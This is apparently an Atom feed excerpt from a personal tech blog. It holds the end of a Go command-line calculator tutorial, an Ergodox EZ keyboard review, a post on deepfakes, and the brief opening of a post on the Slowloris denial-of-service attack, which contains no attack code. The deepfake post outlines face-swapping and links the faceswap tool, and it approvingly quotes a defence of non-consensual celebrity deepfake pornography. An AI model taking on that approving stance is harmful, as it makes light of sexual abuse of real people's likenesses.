&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		firstInt, _&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span&gt; strconv.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;ParseFloat&lt;&#x2F;span&gt;&lt;span&gt;(flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Arg&lt;&#x2F;span&gt;&lt;span&gt;(i),&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 64&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		secondInt, _&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span&gt; strconv.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;ParseFloat&lt;&#x2F;span&gt;&lt;span&gt;(flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Arg&lt;&#x2F;span&gt;&lt;span&gt;(i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;+&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;1&lt;&#x2F;span&gt;&lt;span&gt;),&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 64&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;		if&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;+&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; + &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; = &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, firstInt, secondInt, firstInt&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;+&lt;&#x2F;span&gt;&lt;span&gt;secondInt)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; else if&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;-&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; - &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; = &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, firstInt, secondInt, firstInt&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;-&lt;&#x2F;span&gt;&lt;span&gt;secondInt)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; else if&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;*&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; * &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; = &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, firstInt, secondInt, firstInt&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;*&lt;&#x2F;span&gt;&lt;span&gt;secondInt)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; else if&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;&#x2F;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;			fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &#x2F; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; = &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%.2f\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, firstInt, secondInt, firstInt&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;&#x2F;&lt;&#x2F;span&gt;&lt;span&gt;secondInt)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; else&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;			println&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Operator not recognised.&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;go run 2-1.go -o &amp;quot;&#x2F;&amp;quot; 1 2 3 4 5 6 7 8 9 10&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;1.00 &#x2F; 2.00 = 0.50&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;3.00 &#x2F; 4.00 = 0.75&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;5.00 &#x2F; 6.00 = 0.83&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;7.00 &#x2F; 8.00 = 0.88&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;9.00 &#x2F; 10.00 = 0.90&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;Compared to other implementations in other languages, like argparse in Python, the flag package might not be a very advanced or intuitive one. For simple and small programs, it might get the job done. There are some obvious shortcomings, for example the flag package does not support mandatory or required flags (meaning the flag must be specified explicitly).&lt;&#x2F;p&gt;
&lt;p&gt;Hence, you might want to check out more extensive implementations like &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;urfave&#x2F;cli&quot;&gt;cli&lt;&#x2F;a&gt; and &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;spf13&#x2F;cobra&quot;&gt;Cobra&lt;&#x2F;a&gt;. Cobra is used in many projects written in Go like &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;gohugo.io&#x2F;&quot;&gt;Hugo&lt;&#x2F;a&gt; and &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;kubernetes.io&#x2F;&quot;&gt;Kubernetes&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Ergodox EZ review</title>
        <published>2018-03-29T00:00:00+00:00</published>
        <updated>2018-03-29T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/ergodox-ez-review/"/>
        <id>https://maxine.dev/post/ergodox-ez-review/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/ergodox-ez-review/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;ergodox1.jpg&quot; alt=&quot;Ergodox EZ Shine (1st gen.)&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;TL;DR: It&#x27;s open source, programmable and awesome.&lt;&#x2F;p&gt;
&lt;p&gt;Last year, during long hours of programming, I started to develop a repetitive stress injury (RSI) on my right wrist&#x2F;arm. At one point it was so bad that I could barely write without swearing after each for loop. I was using a relative ok keyboard at the time, although it had generic Cherry Blue clone keycaps, I was rather happy with it. I realised, however, that I had to make changes to my input devices as well as my habits.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ergodox-to-the-rescue&quot;&gt;Ergodox to the rescue&lt;&#x2F;h2&gt;
&lt;p&gt;I looked at many input devices; everything from Maltron to programming Python and C++ using speech synthesis was considered. After browsing through Reddit, which I often do, I stumbled upon the Ergodox design. Not only was it open source, but it was also supported by QMK that I knew from before was used on many DIY keyboards like the Planck. While the Planck was very small, and I really wanted a split &quot;Maltron-style&quot; keyboard, I went for the Ergodox EZ. I could have built it myself, but while I do consider my &lt;em&gt;soldering&lt;&#x2F;em&gt; skills adequate, I would not embark on such a project by myself. I should also point out that I did consider &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;falba.tech&quot;&gt;Falbatech&lt;&#x2F;a&gt; as I live in Poland, but opted for the Ergodox EZ as I liked the design much more.&lt;&#x2F;p&gt;
&lt;p&gt;After three agonising weeks of waiting as well as switching from Qwerty to Dvorak in hopes that it might make my wrists less angry at me, it finally arrived. My configuration was the black version of Ergodox EZ Shine with lettered keycaps, Cherry Brown switches and the palm rests. With a total price of 350 USD is not cheap compared to what one would expect when one is ordering &quot;a keyboard from China&quot; (Taiwan in this case), but it has its reasons. Not only are the workers fairly paid, but the Ergodox design is pretty labour intensive to build. It is very unorthodox compared to other designs like the Planck, it consists of many parts and it must be tested as well. Building it by yourself would probably cost equally as much, if not more, plus it is very easy to mess up with the soldering if it&#x27;s your first time doing it; from all the videos I&#x27;ve seen, it seems rather cumbersome.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;customise-everything&quot;&gt;Customise everything&lt;&#x2F;h2&gt;
&lt;p&gt;Any keyboard that has the possibility to be programmed is a good choice. As the Ergodox design is open source (which is awesome), as well as all the software around it, making it very easy to customise. I use the &lt;a rel=&quot;external&quot; href=&quot;http:&#x2F;&#x2F;qmk.fm&#x2F;&quot;&gt;QMK firmware&lt;&#x2F;a&gt;, as I think the &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;ergodox-ez.com&#x2F;#graphicalconfigurator&quot;&gt;graphical configurator&lt;&#x2F;a&gt; is not doing the keyboard justice. That is also some of the things that could be improved, especially for users who expect this to be an &quot;out-of-the-box&quot; experience, which it is not.&lt;&#x2F;p&gt;
&lt;p&gt;I had the need for a slightly altered Dvorak layout that was convenient for writing Python and C++ as well as for using Norwegian characters in Unicode. Thus, having the option to customise every key to whatever function is important. I am also changing back and forth between configurations, in the hopes of improving my productivity with new layouts. This makes using the graphical configurator cumbersome, but it is really meant for more basic layouts and it is a good option if you don&#x27;t want to fuck around with C in QMK, as well as compiling it yourself. QMK has a steep learning curve, but if you have the time, it can be very empowering and fun to use.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;vagnes&#x2F;ergodox-layout&quot;&gt;You can find my current layout on GitHub.&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;design-and-build-quality&quot;&gt;Design and build quality&lt;&#x2F;h2&gt;
&lt;p&gt;Many say that they are impressed with the build quality, and while it is indeed good, it is not perfect. From the uneven gap between the upper and lower part of the shell to the mediocre cables and slightly &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;ErgoDoxEZ&#x2F;comments&#x2F;7v3vzh&#x2F;notes_from_a_firsttime_ergodox_ez_user&#x2F;&quot;&gt;uneven LED colours&lt;&#x2F;a&gt;, it definitely has some nit-picky details that could be improved. I have no problem with it being utilitarian, but these small things really irritate me. Apart from that, however, it feels solid. It even sounds solid when you tap on it, but despite that the Ergodox EZ is lighter than expected. The keys feel good and the letterings (Qwerty, for reference in games) does not seem to have worn off a single bit, even though I use it for probably 10 hours a day since I got it in December last year.&lt;&#x2F;p&gt;
&lt;p&gt;With or without the tent kit, the keyboard is also very sturdy. With just enough friction on the feet to keep them in position, but move when I want it to, they really did well on this part. There is nothing more irritating than having a sliding keyboard, or a keyboard that has so much friction that you have to lift it to move it.&lt;&#x2F;p&gt;
&lt;p&gt;Having the LED lights under the keyboard halves instead of in the keys was an interesting choice, which most people will love or hate the idea of. I am rather indifferent to having backlit keys as I never look at my keyboard unless I am trying to remember where the keys are on a Qwerty layout when playing games.&lt;&#x2F;p&gt;
&lt;p&gt;It should also be noted that it has a two year warranty and that Ergodox EZ has a really good customer service that is constantly &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;reddit.com&#x2F;u&#x2F;ezuk&quot;&gt;available on Reddit&lt;&#x2F;a&gt; where they respond to queries.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;NOTE: I ordered this keyboard &lt;em&gt;before&lt;&#x2F;em&gt; removable switches were available.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;everyday-use&quot;&gt;Everyday use&lt;&#x2F;h2&gt;
&lt;p&gt;As I program, write or make music throughout the whole day, I am really nailed to my input devices. My high use probably explains the sudden onset of RSI, and thus also justifies making these drastic changes to improve my workflow. Still, without these challenges, I might still have changed to a Keyboard such as the Ergodox just for its possibilities with customisability and feel.&lt;&#x2F;p&gt;
&lt;p&gt;One of the drawbacks of having an elaborate setup such as the Ergodox, or other elaborate builds like Dactyl, is that is more often than not highly inconvenient to bring anywhere. While there exist alternate designs of the Ergodox, such as the smaller and more portable Orthodox or &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;atreus.technomancy.us&#x2F;&quot;&gt;Atreus&lt;&#x2F;a&gt;, they sometimes lack in ergonomics and are often kits rather than full products you can buy. Personally, I don&#x27;t care that much as I usually write at home on my workstation anyway, but I am thinking about maybe building my own keyboard to complement the design of the Ergodox in the near future.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;I am really impressed that a company made a keyboard with such a wide range of features to us folks that may not be the best at DIY hardware projects, or software for that matter, albeit some tinkering is still needed for it to do it justice. If you have no willpower to learn new stuff, this keyboard will probably kill you. I have now used it for four months, and I still have only explored &lt;em&gt;just the tip&lt;&#x2F;em&gt; of the ice berg of what is possible.&lt;&#x2F;p&gt;
&lt;p&gt;It is not for everyone, especially for those who hate tinkering and troubleshooting. A lot of weird stuff has happened often when I have played around with the configurations, so do keep a spare keyboard for backup. It&#x27;s also not for everyone considering the price, and like with most ergonomic keyboards that is to be expected, but there are other alternatives that one should check out before you order this particular model. For me, it was worth it, and it has enhanced my workflow considerably.&lt;&#x2F;p&gt;
&lt;p&gt;In my opinion, this is the best investment you can do as a programmer or writer, alongside condoms.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Deepfaking</title>
        <published>2018-01-26T00:00:00+00:00</published>
        <updated>2018-01-26T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/deepfaking/"/>
        <id>https://maxine.dev/post/deepfaking/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/deepfaking/">&lt;p&gt;&lt;strong&gt;NOTE: This article contains links to sites that are &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Not_safe_for_work&quot;&gt;NSFW&lt;&#x2F;a&gt;.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;What do you do when even video evidence is fake?&lt;&#x2F;p&gt;
&lt;p&gt;For many years now, we have been used to image manipulation, and I am not talking about photoshop and computers. Retoucheing of pictures has been a common practice since the very early days of photography. Using brushes and other tools, everything from blemishes on queens and people Stalin did not like has been removed from pictures. After a while came computers and revolutionised the process. The same thing is happening again, but to video.&lt;&#x2F;p&gt;
&lt;p&gt;Deepfaking, defined as faking something by the use of deep learning (a part of the machine learning family), is taking the internet by storm since late 2017. In particular, it has become a common practice to use this to replace faces of porn stars with faces of celebrities.
f
To be fair, it is not like this has never happened before, it is just that this has made it so much easier to do, and with even little effort, the result is astonishing in comparison to older methods such as rotoscoping and hoping for the best.&lt;&#x2F;p&gt;
&lt;p&gt;If you are at this point totally lost and do not know what I am talking about, you should watch CGP Grey&#x27;s video on machine learning before reading any further.&lt;&#x2F;p&gt;
&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https:&#x2F;&#x2F;www.youtube-nocookie.com&#x2F;embed&#x2F;R9OHn5ZF4Uo?rel=0&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; encrypted-media&quot; allowfullscreen&gt;&lt;&#x2F;iframe&gt;
&lt;h2 id=&quot;the-tech&quot;&gt;The tech&lt;&#x2F;h2&gt;
&lt;p&gt;Using machine learning to generate images is old news. Apart from those beneath rocks, we have all seen the trippy &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;dreamdeeply.com&#x2F;&quot;&gt;DeepDream pictures&lt;&#x2F;a&gt;. You might also have seen the way textures has been generated by the help of neural networks and how &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;qz.com&#x2F;1090267&#x2F;artificial-intelligence-can-now-show-you-how-those-pants-will-fit&#x2F;&quot;&gt;neural networks help you to try on your clothes for you.&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https:&#x2F;&#x2F;www.youtube-nocookie.com&#x2F;embed&#x2F;Uo6hFVRsjpA?rel=0&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; encrypted-media&quot; allowfullscreen&gt;&lt;&#x2F;iframe&gt;
&lt;p&gt;The technology behind deepfaking is very similar. It uses neural networks and deep learning to take a series of images of the face to be attached, ideally as many as possible and from different angles, as well as the video to be manipulated. The manipulation can then begin and is done in three stages.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Produce training data for the model (in the case of most deepfakes, a celebrity).&lt;&#x2F;li&gt;
&lt;li&gt;Running a neural network to emulate the face of the model.&lt;&#x2F;li&gt;
&lt;li&gt;Using the neural network, the model&#x27;s face is projected unto the original face in the video.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;In the end, you will have something like the following.&lt;&#x2F;p&gt;
&lt;div style=&#x27;position:relative;padding-bottom:57%&#x27;&gt;&lt;iframe src=&#x27;https:&#x2F;&#x2F;gfycat.com&#x2F;ifr&#x2F;IllinformedBriefBluemorphobutterfly&#x27; frameborder=&#x27;0&#x27; scrolling=&#x27;no&#x27; width=&#x27;100%&#x27; height=&#x27;100%&#x27; style=&#x27;position:absolute;top:0;left:0;&#x27; allowfullscreen&gt;&lt;&#x2F;iframe&gt;&lt;&#x2F;div&gt;
&lt;p&gt;There is also one that is fairly well done of Carrie Fisher (RIP) as a younger princess Leia. The top one is made by ILM&#x2F;Lucasfilms and the bottom one is using deepfaking.&lt;&#x2F;p&gt;
&lt;div style=&#x27;position:relative;padding-bottom:54%&#x27;&gt;&lt;iframe src=&#x27;https:&#x2F;&#x2F;gfycat.com&#x2F;ifr&#x2F;SmallEarlyConey&#x27; frameborder=&#x27;0&#x27; scrolling=&#x27;no&#x27; width=&#x27;100%&#x27; height=&#x27;100%&#x27; style=&#x27;position:absolute;top:0;left:0&#x27; allowfullscreen&gt;&lt;&#x2F;iframe&gt;&lt;&#x2F;div&gt;
&lt;p&gt;These gifs are not pornography, which is rather an exeption than the rule.&lt;&#x2F;p&gt;
&lt;p&gt;The subreddit, for this called &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;deepfakes&#x2F;&quot;&gt;deepfakes&lt;&#x2F;a&gt; made by a user with the same name, contains many more examples that you may explore yourself.&lt;&#x2F;p&gt;
&lt;p&gt;You can easily access the source code, as it is open source and available on GitHub. There exists &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;deepfakes&#x2F;faceswap&quot;&gt;the official one&lt;&#x2F;a&gt; and &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;deepfakes&#x2F;faceswap&quot;&gt;anoter one from the community&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Think about this: This is only the beginning. It is picking up speed every day with a community that is growing with a code repository that is growing, expanding and forking.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-ethics&quot;&gt;The ethics&lt;&#x2F;h2&gt;
&lt;p&gt;When evidence in cases of evidence of crime, video evidence has often been the goto format, as well as DNA and other forensics methods, purely because it has been hard to manipulate in such a way that it could fool a court, although I am not sure if it happened before or not.&lt;&#x2F;p&gt;
&lt;p&gt;With fast paced technology such as the field of machine learning is, it is not unimaginable that in a few years video evidence will be not only useless, but maybe even frowned upon bringing to court. This is all hypothetical, but we should be ready to face these changes. In many ways it is very much the same discussion as the artificial intelligence, and how we have to have legislation before it becomes a problem.&lt;&#x2F;p&gt;
&lt;p&gt;A user by the name &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;user&#x2F;Gravity_Horse&quot;&gt;Gravity_Horse&lt;&#x2F;a&gt; wrote the following on the deepfakes subreddit.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;To those who condemn the practices of this community, we sympathize with you. What we do here isn&#x27;t wholesome or honorable, it&#x27;s derogatory, vulgar, and blindsiding to the women that deepfakes works on.&lt;&#x2F;p&gt;
&lt;p&gt;(...)&lt;&#x2F;p&gt;
&lt;p&gt;This technology is very new. And new scares people. A lot. But while the circumstances may be different, and the applications to this technology far exceed that of, say, Photoshop, the end result is the same. Faked images.&lt;&#x2F;p&gt;
&lt;p&gt;(...)&lt;&#x2F;p&gt;
&lt;p&gt;No matter what happens, this technology was going to become a reality. Nothing could stop that. And ironically enough, the safest hands for it to be in might just be the general public with the power to desensitize it, rather than an exclusive few, with the power to exploit it.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;em&gt;Edited for brevity. &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;deepfakes&#x2F;comments&#x2F;7sycbf&#x2F;a_message_to_everyone_who_opposes_deepfakes_as&#x2F;&quot;&gt;Full text can be found on the subreddit&lt;&#x2F;a&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This Reddit user really gets it. He does acknowledge that it is indeed derogatory towards those who are affected by the activities on the subreddit. He is also right that it scares people. Hell, it scares me. I cannot count on how many times I have seen people faking screenshots to convince or lie about someone about something, so let us just say I do not think this exactly will work against this &quot;culture&quot;.&lt;&#x2F;p&gt;
&lt;p&gt;We would be, however, tricking ourselves if we just ignored the potential massive implications this could possibly yield. Thus, we should really start to focus on how to deal with cases like these and how we can discover fakes in forensics. We cannot simply try to ban its use, like some politicians think they can do with encryption.&lt;&#x2F;p&gt;
&lt;p&gt;How should we tackle this? Maybe start making more deepfakes with Nicolas Cage. That stuff really brightened up my day.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Every technology can be used with bad motivations, and it&#x27;s impossible to stop that.&lt;&#x2F;p&gt;
&lt;p&gt;-- Deepfake to &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.theverge.com&#x2F;2017&#x2F;12&#x2F;12&#x2F;16766596&#x2F;ai-fake-porn-celebrities-machine-learning&quot;&gt;The Verge&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Slowloris</title>
        <published>2017-10-17T00:00:00+00:00</published>
        <updated>2017-10-17T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/slowloris/"/>
        <id>https://maxine.dev/post/slowloris/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/slowloris/">&lt;p&gt;Why don&#x27;t I use Apache for my web server? Is it because Nginx is newer than Apache? Is it because it handles concurrent connections &quot;slightly better&quot; than Apache? No, not really. I don&#x27;t even remember why I started using Nginx; I just did.&lt;&#x2F;p&gt;
&lt;p&gt;One thing I do know, however, is that there is a pretty funny denial of service (DoS) attack that can be done to Apache-based web servers from even a small Raspberry Pi. It is called a &quot;slow and low DoS&quot;, or simply &quot;slowdos&quot; or &quot;slowloris&quot;. It does not only affect Apache; Flask, a Python based web server, is also possible to attack in a similar manner.&lt;&#x2F;p&gt;
